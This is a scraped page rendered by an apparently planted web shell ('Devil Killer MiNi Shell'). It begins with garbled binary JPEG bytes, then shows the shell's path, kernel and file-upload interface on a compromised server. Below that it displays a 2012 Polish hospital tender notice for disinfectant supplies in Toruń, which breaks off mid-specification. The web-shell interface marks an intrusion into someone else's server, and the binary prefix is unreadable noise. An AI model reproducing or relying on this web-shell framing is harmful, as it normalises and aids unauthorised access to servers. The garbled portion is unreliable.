JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120515/155270-N-2012.html

<p class="kh_header"><b>Toruń: Dostawa preparatów dezynfekcyjnych.</b><br>
<b>Numer ogłoszenia: 155270 - 2012; data zamieszczenia: 15.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa preparatów dezynfekcyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:<br>
Zadanie Nr 1 - dostawa preparatów do dezynfekcji i mycia narzędzi<br>
Zadanie Nr 2 - dostawa preparatów do dezynfekcji dużych powierzchni zmywalnych    
                    oraz sprzętu medycznego<br>
Zadanie Nr 3 - dostawa preparatów do dezynfekcji powierzchni i sprzętu medycznego<br>
Zadanie Nr 4 - dostawa preparatów do dezynfekcji inkubatorów<br>
Zadanie Nr 5 - dostawa chusteczek do dezynfekcji drobnego sprzętu medycznego
		      i powierzchni <br>
Zadanie Nr 6 - dostawa preparatów do mycia, dezynfekcji i pielęgnacji rąk<br> 
Zadanie Nr 7 - dostawa preparatów do dezynfekcji i mycia rąk <br>
Zadanie Nr 8 - dostawa preparatów do dezynfekcji maszynowej basenów i kaczek<br>
Zadanie Nr 9 - dostawa preparatów do dezynfekcji unitów stomatologicznych XO4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ aktualne zezwolenie na prowadzenie hurtowni farmaceutycznej - dotyczy tylko zadania Nr 6 i Nr 7.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych min. 2 dostaw preparatów dezynfekcyjnych o wartości minimalnej dla poszczególnych zadań:
- dla zadania nr 1 -    93.120,00 zł
- dla zadania nr 2 -    52.480,00 zł
- dla zadania nr 3 -    10.520,00 zł
 - dla zadania nr 4 -      2.560,00 zł
- dla zadania nr 5 -    15.840,00 zł
- dla zadania nr 6 -    28.080,00 zł
- dla zadania nr 7 -    12.440,00 zł
- dla zadania nr 8 -      5.000,00 zł
- dla zadania nr 9 -         120,00 zł

brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Wykonawca składający ofertę np. na Zadanie Nr 1 i Nr 2 musi wykazać się zrealizowanymi 2 dostawami o wymaganej wartości łącznej równej sumie tych zadań, tj. 145.600,00 zł każda dostawa.
	
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych  podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty: <br>
- dla zadania nr 1 -    58.200,00 zł<br>
- dla zadania nr 2 -    32.800,00 zł<br>
- dla zadania nr 3 -      6.575,00 zł<br>
- dla zadania nr 4 -      1.600,00 zł<br>
- dla zadania nr 5 -      9.900,00 zł<br>
- dla zadania nr 6 -    17.550,00 zł<br>
- dla zadania nr 7 -      7.775,00 zł<br>
- dla zadania nr 8 -      3.125,00 zł<br>
- dla zadania nr 9 -           75,00 zł<br>
wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.

Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) wpis do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych dla produktów kwalifikowanych jako produkty biobójcze zgodnie z ustawą z dnia 13 września 2002 r. o produktach biobójczych (Dz.U. z 2007 r. Nr 39 poz. 252)
<br>
b) aktualnie obowiązujące karty charakterystyki preparatu niebezpiecznego dla oferowanego   preparatu, zgodne z Rozporządzeniem REACH 1907/2006/WE - nie dotyczy zadania Nr 6 i Nr 7.
<br>
c) celem potwierdzenia skuteczności działania bójczego preparatów dezynfekcyjnych należy załączyć: dokumenty potwierdzające, iż przedmiot zamówienia został przebadany i odpowiada Normom Europejskim lub/i Normom Polskim. W razie braku stosownych dokumentów potwierdzających, iż przedmiot zamówienia spełnia Normy Europejskie lub/i Normy Polskie, dopuszcza się alternatywnie badania zaakceptowane przez Państwowy Zakład Higieny  lub wyniki badań wykonane przez akredytowane (notyfikacja, certyfikat jakości ISO) laboratoria z krajów UE - dotyczy zadań od Nr 1 do Nr 5 z wyłączeniem pozycji 2.6 w zadaniu nr 2. W zadaniu nr 2 pozycja 2.6 wymagane potwierdzenie działania bójczego z przeznaczeniem do obszaru spożywczego. W zadaniu nr 2 pozycja 2.2 wymagane badania przy wysokim obciążeniu organicznym erytrocytami baranimi.
<br>
d) charakterystykę produktu leczniczego - dotyczy pozycji Nr 6.1.1 i 6.1.2 z zadania Nr 6 i pozycji 7.1 z zadania Nr 7.
<br>
e) aktualne pozwolenie na dopuszczenie do obrotu produktu leczniczego wydane przez Ministra Zdrowia - dotyczy pozycji Nr 6.1.1 i 6.1.2 z zadania Nr 6 i pozycji 7.1 z zadania Nr 7
<br>
f) próbki oferowanych preparatów - po 1 op. z każdego asortymentu
Wykonawca zobowiązany jest do dostarczenia próbek oferowanego przedmiotu zamówienia przed upływem terminu i godziny wyznaczonej na składanie ofert. Próbki muszą być w oryginalnych opakowaniach handlowych producenta.
Zamawiający zgodnie z art. 97 ust. 2 zwróci próbki na wniosek Wykonawcy, który należy dołączyć do oferty.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) materiały prezentujące oferowane preparaty dezynfekcyjne (prospekty, opisy), zawierające między innymi obszar zastosowań i sposób użycia preparatu,
<br>
b) opis sposobu organizacji odbioru pustych opakowań po środkach dezynfekcyjnych bardzo  toksycznych, toksycznych, mutagennych, niebezpiecznych dla środowiska zgodnie z ustawą z dnia 11.05.2001 roku o odpadach i odpadach opakowaniowych Dz.U.2001 r. nr 63 poz.638.
<br>
c/oświadczenia o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ;<br>
d/ oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym.<br>

2. Ceny podane w ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych<br>
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera<br> 
ul. Św. Józefa 53/59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 09:30, miejsce: Kancelaria<br>
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera<br>
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> *Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - dostawa preparatów do dezynfekcji i mycia narzędzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Dezynfekcja narzędzi (maksymalna wielkość  6 litrów) - 34.000 l<br>
1.2. Dezynfekcja narzędzi i osprzętu endoskopowego (maksymalna wielkość 6 kg) - 69.000 l<br>
1.3. Enzymatyczny preparat do mycia wstępnego endoskopów (maksymalna wielkość 
2 litry) - 6.400 l<br>
1.4.1. Alkaliczny preparat myjący w postaci stałej (maksymalna wielkość 5 kg) - 27 kg<br>
1.4. 2. Płynny środek neutralizujący na bazie kwasu cytrynowego do myjni-dezynfektorów (maksymalna wielkość 5l) -80 l<br>
1.4.3.Płynny środek do dezynfekcji maszynowej na bazie aldehydu glutarowego, bez zawartości glioksalu. (maksymalna wielkość 5l) -200 l <br>
1.4.4. Płynny środek płuczący na bazie kwasów organicznych i związków powierzchniowo-czynnych do myjni-dezynfektorów. (maksymalna wielkość 2 l) -24 l<br>

<br><br>
WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 1<br>
1.1 Środek dezynfekcyjny nie zawierający: aldehydów, pochodnych fenolowych, związków chloru, QAV i substancji nadtlenowych <br>
- spektrum działania - B, F, V, Tbc<br>
- max czas 1 h<br>
1.2: Środek do dezynfekcji narzędzi i osprzętu endoskopowego na bazie aktywnego tlenu (z wykluczeniem nadboranu sodu)
- spektrum działania - B, F, V (Polio, Adeno), Tbc - 10 min. <br>
B, F (A. Niger), V, Tbc (M.Tuberculosis), S (Cl. Difficile, B. Subtilis) -15 min. 
- trwałość roztworu 24 godz. kontrolowana przy pomocy pasków<br>
- przygotowanie roztworu w wodzie o temp. pokojowej<br>

1.3.Enzymatyczny preparat do mycia wstępnego endoskopów, na bazie co najmniej 4 enzymów, ph 6-7<br>
1.4 Mycie i dezynfekcja maszynowa narzędzi chirurgicznych:<br>

1.4.1 Alkaliczny preparat myjący w postaci stałej zawierający wodorotlenek sodu, inhibitory korozji, nie zawierający środków powierzchniowo-czynnych, węglowodorów, fosfatów i NTA. Przeznaczony do mycia i dezynfekcji termicznej narzędzi chirurgicznych i sprzętu anestezjologicznego. Dozowanie 3-5ml/l, pH 13 (1%). Opakowanie - kapsuła 4,5 kg 
1.4.2 Płynny środek neutralizujący na bazie kwasu cytrynowego do myjni-dezynfektorów. pH 1,1(koncentrat). Dozowanie 1-2 ml/l. Opakowanie - kanister 5l.<br>
1.4.3 Płynny środek do dezynfekcji maszynowej na bazie aldehydu glutarowego, bez zawartości glioksalu. Spektrum działania - B, F, Tbc(m. tuberculosis), V(Tr HSV-1) - 5min. Dozowanie 10ml/l. Opakowanie - kanister 5l.<br>
1.4.4 Płynny środek płuczący na bazie kwasów organicznych i związków powierzchniowo-czynnych do myjni-dezynfektorów. pH 2 (koncentrat). Dozowanie 0,3-1 ml/l. Opakowanie - butelka 2l.<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa preparatów do dezynfekcji dużych powierzchni zmywalnych oraz  		      sprzętu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1. Preparat myjąco- dezynfekujący (maksymalna wielkość pojemnika 6 litrów) -75.000 l <br>
2.2. Preparat dezynfekcyjny (substancja aktywna - NaDCC) (maksymalna wielkość 
300 tab.) - 124.200 l<br>
2.3. Preparat myjąco - dezynfekcyjny do dużych powierzchni i sprzętu medycznego na bazie QAV i diaminy (maksymalna wielkość pojemnika 5 litrów) - 20.000 l
2.4.Preparat w postaci pianki do dezynfekcji sprzętu USG i aparatury medycznej (max. wielkość 750 ml) - 110 l<br>
2.5.1. Środek myjąco-dezynfekujący w postaci żelu do czyszczenia odsysaczy i ślinociągów stomatologicznych (max. wielkość 1 l) - 40 l<br>
2.5.2. Środek myjąco-dezynfekujący w postaci żelu do czyszczenia odsysaczy i ślinociągów stomatologicznych (max. wielkość  5l) - 160 l<br>
2.6. Preparat do dezynfekcji lodówek z żywnością (max. wielkość  750 ml) - 45 l<br>

<br><br>

WIELKOŚĆ, STRUKTURA ZAMÓWIENIA I WYMOGI
 TECHNICZNO-UŻYTKOWE DLA OFEROWANYCH ŚRODKÓW DEZYNFEKCYJNYCH - Zadanie Nr 2<br>
2.1 Preparat myjąco - dezynfekujący, bez aldehydów, pochodnych fenolowych, związków chloru, QAV i kwasu nadoctowego<br>
- spektrum działania - B, F, V(HIV, HBV, Vakcinia, Rota), Tbc<br>
- max czas 15 min.<br>
2.2 Preparat dezynfekcyjny do powierzchni skażonych materiałem biologicznym oraz basenów i kaczek.<br>
- substancja aktywna - NaDCC<br>
- spektrum działania - B, V (Polio, Adeno), F (Aspergillus Niger), Tbc (M.Tuberculosis)<br>
- max czas 15 min<br>
- max stężenie aktywnego chloru - 2.000 ppm w   roztworze <br>
- pH roztworu 7<br>
- skuteczny wobec S (Cl. Difficile) w wyższych stężeniach - Wymagane miarki z nazwą preparatu do przygotowywania roztworu roboczego.<br>
2.3 Preparat myjąco - dezynfekcyjny do dużych powierzchni i sprzętu medycznego na bazie QAV i diaminy, bez zawartości innych substancji czynnych. pH = 9-10.  Możliwość użycia na oddziałach dziecięcych i noworodkowych. <br>
- Spektrum działania: B, Tbc, F (łącznie z A.Niger), 
V (HIV, HBV, HCV, Rota, Noro) 
